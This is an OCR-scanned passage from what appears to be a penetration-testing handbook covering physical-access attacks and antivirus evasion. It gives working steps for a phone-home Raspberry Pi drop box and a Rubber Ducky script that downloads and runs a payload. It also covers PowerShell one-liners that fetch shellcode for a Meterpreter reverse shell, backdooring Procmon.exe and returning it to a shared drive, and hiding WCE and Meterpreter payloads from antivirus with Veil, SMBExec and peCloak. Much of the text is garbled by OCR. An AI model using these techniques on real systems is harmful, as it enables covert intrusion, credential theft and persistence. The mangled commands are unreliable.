Build image on 64 bit version of Kali Linux and write image to SD Card: 
ө weet https://raw.githubusercontent.com/offensive-security/kali-arm-build- 
scripts/master/build-deps.sh 
e chmod +x build-dep.sh && ./build-dep.sh 
e dd if-/root/kali-1.1.0-rpi.img of=/dev/sdb bs-4M 


Move that SD Card from your Kali host onto the Raspberry Pi 2 and run some initial configurations to 
update SSH, change the password, and expand the drive: 

e update-rc.d -f ssh remove 

e update-rc.d -f ssh defaults 

e dpkg-reconfigure openssh-server 

e passwd 

e wget https://raw.github.com/dweeber/rpiwiggle/master/rpi-wiggle 

e chmod +x rpi-wiggle 

e /rpi-wiggle 


Afterwards, you can install whichever tools you need to install onto that image. 


Once you have your Raspberry Pi 2 device configured to your liking, we need to install a reverse 
shell to use as а drop box. I developed a quick little script called pi phone home. Once installed and 
running, when the drop box is plugged into any network, it automatically phones home and gives the 
attack a full SSH tunnel to the drop box host. 


Froma terminal type: 
e git clone https://www.github.conycheetz;pi phone home /opt/pi phone home 
e cd /opt/pi phone home && chmod +x * 


We also need to make some modifications to the callback script. Remember that this box will log into 
your server on the Internet via SSH and create a local tunnel on your server. You will have to provide 
the script login credentials to your Internet-facing server: 

e gedit callback.sh 

e edit the domains, usernames, passwords, and port numbers 

e #!/bin/sh 

e if ps -ef | grep -v grep | grep [your server you own] ; then 

e exit 0 

e else 

ө sshpass -p 'PASSWORD' ssh -o "StrictHostKeyChecking no" -f -N -T - 

R2221:localhost:22 [your server you own] -p22 -1 [USERNAME] >> /dev/null & 

e fi 


Once these modifications are made, we can start up the service: 
e /setup.sh 


The setup file will install the proper dependencies, configure the local ssh server, make 
modifications with the sshd config, and add a cronjob to run the script every two minutes. 


i ЫЈ. аа аа 2 _ —— в. aX d nnn. _ 


е О © Т admin — root@thehackerplaybook; ~ — ssh 52x55 м” 
root@thehackerplaybook:~# netstat -ano | grep 2221 rootGkali:/opt/pi phone home& ./setup.sh 

| tep e Ө 127.0.0.1:2221 .0.0: Reading package lists... Done 

| LISTEN off (0.00/0/0) Building dependency tree 
tcp e 0 127.0.0.1:57378 127.0.0. E Reading state information... Done 

| 1:2221 TIME_WAIT timewait (22. Sepe openssh-server is already the newest version. 
tcp e 0 127.0.0.1:57801 0.0. FO upgraded, 0 newly installed, 0 to remove and 
1:2221 TI WATT timewait (35. 47/070) Ө not upgraded. 

| tcp6 e ::1:2221 : f Reading package lists... Done и 

ursten off (0.00/0/0) f Building dependency tree 


| root&thehackerplaybook:-* ssh root@127.@.8.1 -p 2221 
| roote127.0.0.1's password: 
| Last login: Tue Feb 24 08:13:35 2015 from kali 


Reading state information... Done 
openssh-client is already the newest version. 
Ө upgraded, © newly installed, @ to remove and 
8 not upgraded. 

Reading package lists... Done 

Building dependency tree 

Reading state information... Done 

sshpass is already the newest version. 


The programs included with the Kali GNU/Linux system 
are free software; 

the exact distribution terms for each program are def 
scribed in the | 
individual files in /usr/share/doc/*/copyright. Ө upgraded, 8 newly installed, @ to remove and 
Ө not upgraded. 

Generating public/private rsa key pa 

S Enter file in which to save the key (775007: ssh 
/id rsa): 

/root/.ssh/id rsa already exists. 


Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to 

the extent 

permitted by applicable law. 

root@kali:~# hostname 

kali Overwrite (y/n)? y 

rootekali:~# I Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ss 


Dropbox SSH Tunnels 





In the terminal on the right, we kicked off the setup.sh batch file on our Raspberry Pi 2 device. After 
two minutes, the Pi device will connect back to our server (on the left) and login via SSH. It will 
create a tunnel over port 2221. 


We can see this on our server by running “netstat -ano | grep 2221”. If we see an output, we know 
everything has worked perfectly. We can now SSH back through that tunnel to have full access on our 
Raspberry Pi. We can run: 

e ssh [username of Raspberry Pi server]|@127.0.0.1 -p [tunnel port] 


As we can see on the left image above, we have connected back to our Raspberry PI through the 
tunnel over SSH and ran a hostname. Now, we can kick off scans, run Metasploit, and more. 


Remember, after the first time you run this code, it adds cronjob to run the script every five minutes. 
So even if you unplug your device and replug it in, it will automatically connect back to your SSH 
server. This is a great drop box to plug in and run away. 


Rubber Ducky 
(http://hakshop.myshopity.com/products/usb-rubber-ducky-deluxe) 


Rubber Ducky is a USB device that is called a HID or Human Interface Device. Now that most 
systems no longer allow autorun by default, we need to get creative. The Rubber Ducky device looks 
just like the standard USB stick, but instead of storing files and data, they store keystrokes (like 
emulating someone on the keyboard). This is how we can get around issues like autorun and quickly 
use keystrokes to compromise a machine. 


So if we had physical access to a computer and wanted to compromise the system, what would we 
do? One way would be to hit the start menu, drop into an administrative CMD shell (bypassing UAC), 
and execute a PowerShell script to download and execute a malicious payload. This might look like 


the following: 


Ducky admin$ cat duckycode.txt 


e ESCAPE 

e CONTROL ESCAPE (Brings up start menu) 

e DELAY 400 

e STRING cmd (types “ста”) 

e DELAY 400 

e MENU (right clicks on cmd) 

e DELAY 400 

e STRING a (types “a” to select run as administrator) 
e DELAY 600 

e LEFTARROW (presses the left arrow button) 

e ENTER 

e DELAY 600 

ө STRING cmd.exe /c "PowerShell (New-Object 


System. Net. WebClient). DownloadFile(‘http://192.168.0.102/winword.exe','winword.¢ 
(New-Object -com  Shell.Application).ShellExecute("winword.exe'" (Runs a 
PowerShell script to download and execute a file) 

e ENTER 

e STRING exit (close the command prompt) 

e ENTER 


Try these exact same commands on your Window 7 host and you will see exactly what it is doing. 
Now, we can easily change the string to download a PowerShell script instead and execute a 
Meterpreter shell: 


e Powershell.exe -NoP -Noni -W Hidden -Exec Bypass IEX (New-Object 
Net.WebClient). DownloadString(‘https://raw.githubusercontent.com/cheetz/PowerSplc 
-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse https - 
Lhost 192.168.0.102 -Lport 8080 -Force 


The code to run the encoder can be found on your rubber ducky or here: 


https://drive.google.com/drive/#folders/OB7uVAbdkMKcXNW1KdnBrOzZtV3c 


The ducky code can be injected into the microSD card using the following command (this was done 
ona Mac, but is also OS independent as it runs JAVA). 


The encoder jar file will take the code we supplied and write to an inject.bin file on the microSD 
card. To write your code, it uses the following syntax: 


e java -jar encoder.jar -1 [your code] -o [location and file to which to write on the 
microSD card] 


Example: 
e admins-mbp:Ducky admin$ java -jar епсойегјаг -i  duckycode.txt -o 
/Volumes/Untitled/inject.bin 


Hak5 Duck Encoder 2.6.3 


Loading File ..... [OK] 
Loading Keyboard File ..... [OK] 
Loading Language File ..... [OK] 
Loading DuckyScript ..... [OK] 
DuckyScript Complete..... [ОК | 


After successfully writing to the microSD card, we can assemble our USB stick again and will be all 
set. Once we plug in this USB drive into a computer, we will see the following on the computer 
screen: 


el 
—— a 
fs Administrator: C:\Windows\System32\cmd.exe - cmd.exe /c "PowerShell (New-Object 


Microsoft Windows [Version 6.1.76011 
Copyright <c) 2009 Microsoft Corporation. #11 rights reserv 


C:\Windows\system32>cmd.exe /с “PowerShell (New-Object Syste 
it ion> .ShellExecute(’ winword.exe’ >" 






















Programs (1) 


E cmd.exe 
\ Ореп 
Document 2 
Run as administrator 
Updat: 
EE our , 
Files (25) CRC SHA > 


85) oclExar [A Edit with Notepad++ 
20 oclExar @ Scan with Microsoft Security Essentials... 


5) oclExan Unpin from Taskbar 

E] oclExar Pin to Start Menu 

0) oclExar Restore previous versions 

©] oclExar 

= Send to › 
93 oclExar 

&&] oclExar Cut 


&] oclExan Copy 





госкуо 
ЕЗ rocky Delete 
LJ change 
Open file location 
32 See more 


Properties 





D TShutdown | > | 


Rubber Ducky 


This is only the beginning of what you can do with a HID device. Two additional sites that describe 
additional functionality or pre-made scripts to inject into your rubber ducky are: 


e https://github.com/hakSdarren/USB-Rubber-Ducky/wiki/Payloads 
e http://ducktoolkit-411.rhcloud.com/ScriptSelection.jsp 


WScriptSelection.jsp c } @ 


ms*  \тадез, ў information" @Miscellaneous* J Outlines /#Ңейгте” # Tools” ¢>View Source’ |lHOptions * 


Duck Toolkit 









HOME ENCODER PAYLOAD GEN TWIN DUCK ABOUT HE 


: h l i гї 
Reconnaissance When you have selected all required scripts 


Computer Information 

User Information Continue 
USB Information 

Shared Drive Information 

Program Information 


Installed Updates 

User Document List Advertisement 
Basic Network Information 

Network Scan 

Port Scan 

Copy Wireless Profile 

Take Screen Captures 

Copy FireFox Profile 


Extract SAM File 


Exploitation 


Find and Upload File (FTP) 
Disable Firewall 

Add User 

Open Firewall Port 

Start Wi-Fi Access Point 
Share C:\ Drive 

Enable RDP 








Rubber Ducky Payloads 
Conclusion 


Attacks where you need to be physically onsite require a lot of patience 
and practice. As you probably already know, these types of attacks give 
the largest adrenaline rushes. It is very important to keep calm and make 
sure you know exactly what you need to do and do it as quickly as 
possible. The best scenario for you is to be in and out without alarming 
a single person. My advice: practice, practice, and practice. 


The Quarterback Sneak - Evading AV 


My feelings on Anti-Virus (AV) scanners are that they are there to stop the script kiddies or 
oldmalware. If you are using the default settings for Metasploit or using files you downloaded from 
the internet, chances are that you are going to not only get caught, but your whole engagement could be 
over. The element of surprise could play a huge factor in how successfully you move laterally 
throughout the environment. This chapter will go into how to make sure you stay ahead of the curve 
and not alert AV scanners. 


Evading AV 


I regularly run into AV programs that alert or block the standard Meterpreter payload, Windows 
Credential Editor (WCE), or other common penetration testing tools. Even the encoders in 
Metasploit, like msfvenom and Shakata Ga Nai, just aren't cutting it anymore. So here are a slew of 
other options. 


The Backdoor Factory 
(https://github.com/secretsquirrel/the-backdoor-factory) (Kali Linux) 


The goal of BDF is to patch executable binaries with user desired shellcode and continue normal 
execution of the prepatched state. How can you use this to your advantage? Persistence is the key! 
First, we need to find a file to which to add our shellcode. What is the best method for this? 


Research was done by harmJOy to find the best files to backdoor by searching open shares. {44} What 
if we can search the file share server and find the last accessed file? This way, we know that the files 
are regularly used. If you have a command shell on a victim, you can run the following two 
commands: 
ө Powershell.exe "TEX (New-Object 
Net. WebClient). DownloadString(‘https://raw.githubusercontent.com/cheetz/PowerToo 
Invoke-ShareFinder -ExcludeIPC -ExcludePrint -CheckShareAccess | Out-File - 
Encoding ascii found_shares.txt" 


This first command will find all the shares on the network that the user has access to. You can either 
modify this text file to be more targeted or go the slow route and look at all files. I have found it best 
to modify this file to target file shares on the network: 
ө Powershell.exe "TEX (New-Object 
Net.WebClient). DownloadString(‘https://raw.githubusercontent.com/cheetz/PowerToo 
Invoke-FileFinder -ShareList .\found shares.txt -FreshEXEs -ExcludeHidden - 
CheckWriteAccess" 


The second command takes the output from the shares and starts enumerating all the executables and 
finding the LastAccessTime and LastWriteTime. In the example below, we see that Procmon.exe on 
the fileshare has the very last access time. This is an indication that it could be regularly used. If we 
modify this file, there is a good chance that it will get executed continually. 


, 1 j " 
TT ree Ра 17 nd ye 
ix Peis SPARTE EOC АНИ 


C: \Woera\teatuser | Powershell exe “TEX (Hou Object Net WebClient).DewnloadString( httpa://raw gi thubusercentent , cog/Harn 
Plie. pel’): Invoke-ShareFinder -ExcludelPC -ExcludePrint -Checkiharesccess | Qut-File -Encoding ascii found sharen. txt 


Ciero овце! уре found sharen. txt 

WDC hacker. testlab\WETLOGON — - Logon server share 
^ADE hacker , test lab) Share s 

WIC hacker. teat 1а ПД. Ht aui 


C;\Wsers\testuser] Powershell exe “ТЕХ (Now-Object Net WobClient) Dounloadstrina( https://ra, gi thubusercontent  cos/Harn 
Ова раї"): Invake-FileFinder -ShareList Found shares.txt -FrishEXEs -ExeludeHidden -CheckWritenceent" 


т MMC hacker. test Tab Share RddInProcess xe 
: BUILTIMN\Adeinistrators 

BT UMP 

1120/2010 7:25:05 РИ 

ШЕКТЕ 


» ADE hackor. test Lab лаге add nProcessd2. axe 
: BUILTIN Administrators 

1 {ДИБ 10:48:52 PH 

© 1/20/2016 7:24:57 PH 

ШЕКТЕ 


: MC hacker. testlab\Share\addInutil axe 
ИЕА НД ГИЛ ИД И: 

ИЛЛЕГ ЕЕ PH 

ШЕЕ 7:25:85 РН 

г 38136 


: АОС hacker. testlab\Share'aitagent oxe 
г BUILTIN Ms 
: 1/6/2015 10:48:56 PH 
= 11720/2010 7:24:88 PH 
122980 


: MMC. hacker, teotlab\Share\PrintBraEngine, exe 
т BUILTIMAdainistratore 

Wie LAB : 1/6/2015 10:48:54 PH 

аеш етіне : 11/20/2010 7:34:51 PH 
EF TFT 


MM LIMES diui NI 
: BUILTIMyAdginistratare 

: 128/2015 10:32:03 PH 

: 4/2015 9:39:21 PH 

: 2510523 


PowerView - Invoke-File Finder 





Let’s grab a copy of Procmon.exe from the user and modify that binary. Dropping that binary back on 
our Kali host, we can run BDF on that file. We are going to modify the Procmon.exe executable to 
include a Meterpreter reverse https payload and connect back to your Kali host over the specified 
port. 


Open up a terminal using the following commands: 

e  cd/opt'the-backdoor-factory/ 

e  /backdoor.py -f ~/Desktop/Procmon.exe -s meterpreter reverse https -H «your Kali ІР> - 
P 8080 


ВЕРЕ НЫН НИНИН 





BDF Patching 


Once you execute backdoor.py, you need to find a Cave, which is an area of 0’s to hold your 


shellcode. If you don't like the locations initially suggested, you can press “yj” or jump to see 
additional caves. 





BDF Caves 


Once you find a cave that works, press “а” to append your code. After this is complete, BDF will 
drop the newly created executable in the folder backdoored. 


Now, take that file and put it back on the fileshare. The file should execute perfectly, the user will 
still have all the functionality of Procmon, but every time they run it, it will connect back to our 
Metasploit handler. 





er b Computer » Share AVDO (21 


Open New folder 


A] Process Monitor - Sysinternals: www.sysinternals.com 


File Edk Event Fitter Tools Options Help 











Malicious Procmon 


Just in case you forgot how to create a handler for your file, this is what it will look like. On your 
Kali host, copy the following text to a file on /opt/listener.rc: 
e  useexploit/multi/handler 
set PAYLOAD windows/meterpreter/reverse https 
set LHOST «Your Kali IP> 
set LPORT 8080 
set ExitOnSession false 
exploit -j —z 


To start your listener, use the following command: 
e  msfconsole -r /opt/listner.rc 


: /opt /the-backdoor-factory# msfconsole -r /opt/listner. гс 


[*] Starting the Metasploit Framework console...| 


Save 45% of your time on large engagements with Metasploit Pro 
Learn more on http: //rapid7.com/metasploit 


àl .0- 


--=[ 1379 exploits - 777 auxiliary - 222 post 


] 
[ 342 payloads - 37 encoders - 8 S ] 
] 


--=[ Free Metasploit Pro trial: http://r-7.co/trymsp 


rc for ERB directives. 
)> use exploit/multi/handler 
)> set PAYLOAD windows/meterpreter/reverse_https 
| 


r/reve 
/0 > set LHOST 172 16. 151.128 
> 172.16.151.128 
/opt/listner.rc)> set LPORT 8080 
3080 
/opt/listner.rc)> set ExitOnSession false 
ion => false 
resource (/opt/listner.rc)> exploit -j -z 
[*] Exploit running as background job. 


5: //0.0.0.0:8080/ 





Meterpreter Session 


Hiding WCE From AV (windows) 


I love Windows Credential Editor (WCE) because it can take clear text passwords from memory. 
However, the problem with WCE is that all AV vendors pretty much flag this executable. The quick 
and simple way to bypass AV is through a process of identifying where the AV signature is inside the 
WCE file and modifying it. 


Example: Evade 
( ) (Windows) 


On your Windows host, open Evade (Evade takes that executable and makes multiple versions of that 
file based on the defined size. Let's say you have a 50k file and you wanted to split the file by 5k. It 
will make 10 different versions of that file. The first one will only be the first 5k of the file (will 
contain the MZ header and some additional information). The second file will include the first 5k and 
include the next 5k of data. This goes for the rest of the files. 


In the following examples, we loaded WCE, defined an output location and hit Split! If we look in the 
folder defined in our output, we see that it chopped up the files. 

















O C:\Demo\wee_parse 









and Folder Tasks 
Make a new Folder 
Publish this Folder to the 
Web 


Share this Folder 


er Places 


Demo 

My Documents 
Shared Documents 
My Computer 

My Network Places 











Size 
i SKB 
[КЗ TestFile_10000.exe 10 KB 
"I TestFile_15000.exe 15 KB 
"I TestFile_20000.exe 20 KB 
C] TestFile_25000.exe 25 KB 
“I TestFile_30000.exe 30 KB 
[К TestFile_3S000.exe 35 KB 
"I TestFile_40000.exe 40 KB 
[КЗ TestFile_45000.exe 44 KB 
[КЗ TestFile_S0000.exe 49 KB 
[КЗ TestFile_5S000.exe 54 KB 
[КЗ TestFile_60000.exe 59 KB 
[К TestFile_65000.exe 64 KB 
"I TestFile_70000.exe 69 KB 
Ej TestFile_75000.exe 74КВ | 


Evade Output 


We should have a bunch of different files. If we open a hex editor (HxD) and look at one of the files, 
we see that the first 5000 bytes are in the first file and 10,000 bytes are in the second file. 


TestFile_S000.exe | sÀ TestFile_10000.exe | 


Offset(h) 00 O1 02 03 04 OS 06 


000012С0 83 C4 04 бА 01 EB 62 fÀ.3.éb5..&,f)i. 
000012D0 73 14 s.hl.B.é.V.. fÀ.) 
000012E0 01 ЕВ „ФР. .ВЕ..‹ЕіВ,. 
000012F0 68 FF hyyy.. -hyyyO U.R 
00001300 £8 8B &cÉ. fA. CEL... .< 
00001310 45 EO EàfÀ.*.Eàc Mà. X. fü 
00001320 3A 74 rere Eic MAS. 7 T. < 
00001330 45 EC Eifh.sEic MAfÁ.SM 
00001340 E0 83 àf) icv. ҺА. В.ё-и, 
00001350 00 83 .+%.3.еЙ«..в»#)1 
00001360 01 73 .S. be. B. (3, . fh. 
00001370 6A 01 j.&u«. . ВЕБ. ‹ Ui ED 
00001380 15 B8 tesa EIN 


|2 TestFlle 5000.exe TestFile_10000.exe 


Offset (h) 


00002 5E0 iXNB.£|NB.c.togy 
000025F0 іЁё...07.-РА.ё=р 
00002 600 yes... SHE YY. uD 
00002610 fztNB..u.c. "NB.R 
00002 620 j.éy... f. t Ё›ўў 
00002 630 &"fetNB..u. ; NB. 
00002 640 Ph ^B.&UJ...fÁ. 5. 
00002 650 Eoyyfubogy.u. fel 
00002 660 NB..u.h' .B.éx*.. 
00002 670 fÁ.5.&**, , fuo gy 
00002 680 .uqé.... duns 
00002 690 $$.u*h bB.h$$..3 
00002 6A0 -Y.mDA. Pel... fÀ. 
00002 680 Àu.hi.B.à* ^. . fh 
00002 6CO .3.&d^.. C. 609y. . 
00002 6D0 A igo, fe NB.. 
00002 6Е0 t.h..B.éü... fÁ.é 
00002 6F0 eO f= NB..t. hi. 
00002700 B.èá... fk. e1ayys | 





HEX Output at 10000 Bytes 
File Comparison 


If we open up our calculator, we can see if we subtract the hex values 270F - 1387, we get 1388. 
Converting 1388 to Decimal, we get 5000. Perfect! 


Start with the smallest file (5k) and scan that file with your AV of choice. Does an AV signature 
trigger on that file? Ifno, keep going through each version of that file. When you finally do get AV to 
trigger, you know that something between the last file and the clean file contains the string that the 
Antivirus program looks for. 


















P > wce parse vė ea e parse p 


* | Testfile 5000 6/201 PM Application 
pds =] TestFile_10000 
places =] TestFile_15000 6/201 PM Appli 


1 


* | TestFile 35000 at 1 РМ Application 
T] TestFile 40000 0/26/2013 3:15PM Application 
=] TestFile 45000 f 
=] TestFile 50000 2 
E] TestFile 55000 6/201 PM Application 
E] Testfile 60000 
E] TestFile 65000 
T] TestFile 70000 
©] TestFile 75000 
* 1 TestFile 80000 





Х Potentially Unwanted Program Blocked 


=] TestFile 85000 

$1 TestFile 90000 McAfee prevented a potentially unwanted program from running 
= Я Protect your PC by only allowing programs you trust 

371 Testfile 95000 а d аа 


=] TestFile_100000 Моге ~ 


=] TestFile 105000 


Prenove л. come 
4—2 ———— 


Finding Which File Triggers AV 


When dropping the folder containing all of the split files, AV instantly starts alerting the user about 
malicious files and starts cleaning up. When the cleanup is complete, we now see that all the files are 
still present in that folder before TestFile 130000. That means between the 125000 bytes mark and 
130000 bytes mark of the file 1s the trigger IDS signatures. 


Let's see what is at that location. If we convert the Decimal of 125000 to HEX we get 1 E848. Let's 
take a look in HxD to see what is there. From the location 1E848, we can look around to see what 
caused the signature to fire or we can run Evade again to get more granular. 


In this case, it looks like I was able to identify what the IDS signature is looking for-it looks for the 
name of the application and the owner. 








8 TestFle_5000,exe | 1 TestFile_10000.exe | i TestFie 130000.exe | 0 we2exe| 2 жеее) | 


Offset(h) 00 01 02 03 04 05 06 07 08 09 OA OB OC OD OE OF 


OO01FSSO OA 00 00 OO 61 62 00 OO 46 6F 72 63 65 64 20 53 ....ab..Forced S 
OOOi1FS60 61 66 65 20 4D 6F 64 65 20 45 72 72 6F 72 ЗА 20 afe Mode Error: 
OOO1FS70 63 61 6E 6E 6F 74 20 72 65 61 64 20 63 72 65 64 cannot read cred 
O001F580 65 6E 74 69 61 6C 73 20 75 73 69 6E 67 20 27 73 entials using 's 
OOO1FS9O 61 66 65 20 6D 6F 64 65 27 2E ОА 00 OD OA 00 OO afe mode'....... 
OOO01F5AO0 61 62 00 00 25 2E 38 58 ЗА 00 00 00 25 73 ЗА 25  ab..5.0X:... 58:5 
OOO01FSBO 73 ЗА 00 00 25 2E 32 58 00 00 00 00 ЗА 00 00 00 3:..5.2X....:... 
0001Ё5С0 25 2E 32 58 00 00 00 00 25 2E 38 58 ЗА 00 00 00 +.2Х....+.8Х:... 
0001Ғ5р0 25 73 ЗА 25 73 ЗА 00 00 25 2E 32 58 00 00 00 00 +3:13:..1.2Х.... 
OOO1FSEO ЗА 00 00 00 25 2E 32 58 00 00 ОО 00 61 62 00 00 :...%.2Х....ар.. 
OOOiFSFO OD OA OO OO OA OO 00 OO 73 6F 6D 65 74 68 69 6E ........80methin 
OO0i1F600 67 20 74 65 72 72 69 62 6C 65 20 68 61 70 70 65 д terrible happe 
| OOO1F610 6E 65 64 21 20 63 6F 75 6C 64 20 6E 6F 74 20 61 ned! could not a 
OOO1F620 6С 6C 6F 63 61 74 65 20 6D 65 6D 6F 72 79 20 66 llocate memory f 
OO001F630 6F 72 20 6E 65 77 20 6C 69 73 74 21 OA 00 00 OO ог new list!.... 






























0001F640 É 
0001ғ650 | 6E 
OO001F660 БЕ ` 
0001ғ670 30 31 33 20 41 6D 
0001ғ680 69 7 20 2р 20 
0001Ғ 690 
0001ғ6А0 f ; 
| 0001F680 BS 00 55 73 65 20 66 6F 72 ..Use -h for h 








Identifying the String that Triggers AV 


With HxD, we can write over these values and save our executable to a new file. 


Offset (h) 00 O1 02 03 04 05 06 07 08 09 OA OB OC OD ОЕ OF 


OO001F4F0 25 2E 32 58 25 2E 32 58 25 2E 32 58 25 2E 32 58 5.2Х%.2Х%.2Х%.2Х 
0001Ё500 25 2E 32 58 25 2E 32 58 25 2E 32 58 25 2E 32 58 *%.2Х%.2Х%.2Х%.2Х 
0001F510 25 2E 32 58 25 2E 32 58 25 2E 32 58 25 2E 32 58 %.2Х%.2Х%.2Х%.2Х 
0001F520 25 2E 32 58 25 2E 32 58 25 2E 32 58 25 2E 32 58 *%.2Х%.2Х%.2Х%.2Х 
0001F530 00 00 00 00 55 73 69 6E 67 20 57 43 45 20 57 69 ....Using WCE Wi 
0001F540 6E 64 6F 77 73 20 53 65 72 76 69 63 65 2E 2E 2E ndows Service... 
0001F550 ОА 00 00 00 61 62 00 00 46 6F 72 63 65 64 20 53 ....ab..Forced 5 
OOO1FS60 61 66 65 20 4D 6F 64 65 20 45 72 72 6F 72 ЗА 20 afe Mode Error: 

O001F570 63 61 6E 6E 6F 74 20 72 65 61 64 20 63 72 65 64 cannot read cred 
OO001F580 65 6E 74 69 61 6C 73 20 75 73 69 6E 67 20 27 73 entials using 's 
0001Е590 61 66 65 20 6D 6F 64 65 27 2E ОА 00 OD OA OO OO afe mode'....... 
O001F5A0 61 62 00 00 25 2E 38 58 ЗА 00 00 00 25 73 ЗА 25 8ab..5.8X:... 58:5 
OOO1FSBO 73 ЗА 00 00 25 2E 32 58 00 00 00 00 ЗА 00 00 00 з:..1.2Х....:... 
OOOIFSCO 25 2E 32 58 00 00 OO 00 25 2E 38 58 ЗА 00 00 00 5*.2X....5.8X:... 
OOO1FSDO 25 73 3A 25 73 ЗА 00 OO 25 2E 32 58 00 00 00 00 +3:13:.,.%.2Х.... 
OOO1FSEO ЗА 00 00 00 25 2E 32 58 00 00 00 00 61 62 00 00 :...5.2X....ab.. 
OOO1FSFO OD ОА OO OO OA OO OO 00 73 6F 6D 65 74 68 69 6E ........Somethin 
OOO1F600 67 20 74 65 72 72 69 62 6C 65 20 68 61 70 70 65 g terrible happe 
OOO1F610 6E 65 64 21 20 63 6F 75 6C 64 20 6E 6F 74 20 61 пей! could not a 
OO001F620 6С 6C 6F 63 61 74 65 20 6D 65 6D 6F 72 79 20 66 11осасе memory f 





0001F630 { 
0001F640 
0001Е650 
0001Е660 
0001Е670 
0001F680 
D0001F690 
0001F64A0 
0001F6B0 
















CO 1x 
AAALAAAAAAAAAA 
AAAAAAAAAAAAAA 
AAAAAAAAAAAARA 
AAAAAAAAAAAAAA 
AÀAAAAAAAAAAAAA 
AAAAAAAAAAAAAAA 
AAAAAAAAAAAAAA 








..000i1F6CO . 
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Modifying the Signature to Evade AV 


I wrote over those values with all A's and saved my file as wce2.exe. Luckily, the signature in this 
case was not actually part of the binary executable, but part of the application output. Let's take our 


sample to the AV box and run the scan again. 


LJ Name uate modiried Type wz 
(vin 7 wce2 Application 195 К 


fi Home 
@ Navigat 
€ About 
7 Help 


vá Your computer is secure (no actio 





Issues Scan is done 
v McAfee did not detect any issues on your PC 
0 No further action is required 


Successful AV Scan 


After scanning the file, AV was no longer able to pick up the file and the application still ran 
perfectly. One thing to note here is that this worked because the values we modified in the file did not 
impact the execution of the executable. If the signature was based on code that couldn't be modified to 
run, we would not be able to use this trick. I just wanted to demonstrate some weaknesses with AV 
and the concept of how to bypass them. 


Veil 
(https://github.com/Veil-Framework) (Kali Linux) 


Veil is a Payload Generator to Bypass Antivirus tool created by Christopher Truncer. This tool uses a 
lot of different methods to evade AV, but it is best known for taking the Meterpreter shell, converting 
it to python, and wrapping it around py2exe/pyinstaller. This way the executable can bypass a lot of 
white-listing tools and AV. This is because python is usually an approved white-listed application 
and can be easily encoded so that it can bypass AV. There are a lot of different ways to use Veil, but I 
will go over the most general. 
e cd /opt/Veil/Veil-Evasion 
e /Veil-Evasion.py 
e To see all payloads 
o list 
e We are going to use python/meterpreter/rev https 
o use 25 
o set LHOST [Your Kali IP] 
o generate 
o use pyinstaller 


ritten to: 


rev https 


1 Options: 0S .151.141 LPORT=8443 compile to exezY 


id File: 


[*] Your payload files have been generated, don't get caught 





[>] press any key to return to the main mena: Li] 
Veil-Evasion 


The output results in two files: 


1. Under /root/veil-output/compiled/ is the executable to drop on the Windows system 
2. The other file /root/veil-output/handlers/undetected handler.rc is the Metasploit handler file. 


First, set up the listener for the handler: 
e msfconsole -r /root/veil-output/handlers/undetected handler.rc 


Execute the payload on the Windows victim host: 





Veil-Evasion - Python 


I highly recommend testing with the Ruby executable as well. Instead of using the payload 


python/meterpreter/rev https, select ruby/meterpreter/rev https. The process is the same, but instead 
ofa pyinstaller executable, it is a Ruby executable. 





Veil-Evasion - Ruby 


Why pick Ruby over python? This is all about testing which works best for the environment in which 
you are testing. I have seen instances where AV might pick up one type of file, but will not pick up 
another. Keep testing and you will find the best solution for your current situation. 


SMBExec 
(https://github.com/pentestgeek/smbexec)(Kali Linux) 


SMBExec is a tool developed by bravOhax (https://github.com/bravOhax/smbexec), which contains a 
lot of different functionalities. In this book, we have used the tool to pull hashes from a domain 
controller, but it can also be used to enumerate shares, validate logins, disable UAC, and create an 
obfuscated Meterpreter executable. BravOhax utilizes a number of different obfuscation techniques, 
including randomization and compiling it in native C to bypass AV (read the source code of 
smbexec.sh). This is what we are going to use to create our reverse shell. 


To create an obfuscated reverse Meterpreter executable: 

e cd /opt/smbexec 

e /smbexec.sh 

e Select System Access with the following command: 
o2 

ө Select Create an executable and гс script 
o2 

e Select windows/meterpreter/reverse https 
o2 

e Enter your local host and port 
o 172.16.139.209 
o 443 


Once SMBExec finishes and you exit out of the application, a new folder is created in that same 
directory. It follows a similar timestamp folder name. Inside that folder, you will see the 
backdoor.exe, which is your obfuscated reverse https Meterpreter executable. 


root@kali:/opt/smbexec/2015-03-23-1425-smbexec# 15 -alh 

-rwxr-xr-x 1 root root 110K Mar 23 14:28 backdoor.exe 

-rw-r--r-- | root root 283 Mar 23 14:28 metasetup.rc 

-rw-r--r-- 1 root root 92 Mar 23 14:28 shal-backdoor.hash 

In that same folder you will also see the metasetup.rc script. RC scripts will be discussed a little later 
in the book, but if you take a look at the file, you will see something similar to the code below: 


e spool /opt/smbexec/2015-03-23-1425-smbexec/msfoutput- 1425.txt 
e use exploit/multi/handler 

e set payload windows/meterpreter/reverse https 

e set LHOST 172.16.139.209 

e set LPORT 443 

e set SessionCommunicationTimeout 600 

e set ExitOnSession false 

e set InitialAutoRunScript migrate -f 

e exploit -j -z 


This is a script that automatically configures and runs a reverse handler for the payload you just 
generated. It also adds commands, such as setting up timeouts and automigrating PIDs. To run the RC 
script, use the following command: 

e msfconsole -r metasetup.rc 


PeCloak.py 
(http://www.securitysift.com/pecloak-py-an-experiment-in-av-evasion/) (Windows) 


peCloak.py is a python script that takes an automated approach to AV evasion. Although this is 
experimental code, I really like what Mike Czumak did. He took many of the common evasion tricks 
and wrote something to automate them. He built a simple encoder/decoder, added a number of 
instructions that waste cycles in an effort to trick the AV scanner, and utilized code caves (like we 
discussed with The BackDoor Factory). 


Installation does take a few steps and this was installed on a 32bit Windows XP system: 
e Download http://www.securitysift.com/download/peCloak.py 
e Install 
http://sourceforge.net/projects/winappdbg/files/additional%20packages/PyDasm/ 
e Install https://code.google.conyp/pefile/downloads/list 
ө Save "http://git.nOp.cc/? 


p-SectionDoubleP.gitia-blob plain;f-SectionDoubleP.py;h-93717cdd0ac2935481b9€ 
as SectionDoubleP.py 

I also had to also modify the peCloak.py file: 
e On Line 220 - I had to change "pe.write(pe. OPTIONAL HEADER.SizeOfHeaders, 
filename=fname) # MODIFIED WRITE FUNCTION IN PEFILE!!! to 
“pe.write(‘cloaked.exe’)” 


Once we get peCloak.py running, we can test this on a copy of wce.exe: 
e python.exe peCloak.py -e .text,.data:50:5000 wce.exe 





peCloak.py Beta 


As we can see, it will go through all of the evasion techniques and produce an output file called 
"cloaked.exe". In the image below, we take our modified binary and run it to make sure it executes 
